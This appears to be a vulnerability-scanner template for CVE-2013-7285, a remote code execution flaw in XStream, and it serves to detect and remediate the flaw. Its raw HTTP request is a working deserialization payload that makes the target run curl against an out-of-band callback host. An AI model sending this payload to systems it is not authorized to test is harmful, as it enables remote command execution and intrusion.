id: CVE-2013-7285 info: name: XStream <1.4.6/1.4.10 - Remote Code Execution author: pwnhxl,vicrack severity: critical description: | Xstream API before 1.4.6 and 1.4.10 is susceptible to remote code execution. If the security framework has not been initialized, an attacker can run arbitrary shell commands by manipulating the processed input stream when unmarshaling XML or any supported format. This can allow an attacker to obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: | Upgrade XStream to version 1.4.10 or later to mitigate this vulnerability. reference: - https://x-stream.github.io/CVE-2013-7285.html - https://www.mail-archive.com/user@xstream.codehaus.org/msg00607.html - https://www.mail-archive.com/user@xstream.codehaus.org/msg00604.html - https://nvd.nist.gov/vuln/detail/cve-2013-7285 - https://blog.csdn.net/Xxy605/article/details/126297121 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2013-7285 cwe-id: CWE-78 epss-score: 0.55716 epss-percentile: 0.97607 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: xstream_project product: xstream tags: cve2013,cve,xstream,deserialization,rce,oast,xstream_project http: - raw: - | POST / HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml foo java.lang.Comparable curl http://{{interactsh-url}} start matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: word part: interactsh_request words: - "User-Agent: curl" # digest: 4b0a00483046022100ed54d64a6a5d98f883eec6e0dc9bf3fb76b87372f2f242bcad697a3e8b0ada2d022100adb7292dab8008a25c2e9765555bc1f1eacac15af2ca9d04af09f6e758fd78ee:922c64590222798bb761d5b6d8e72950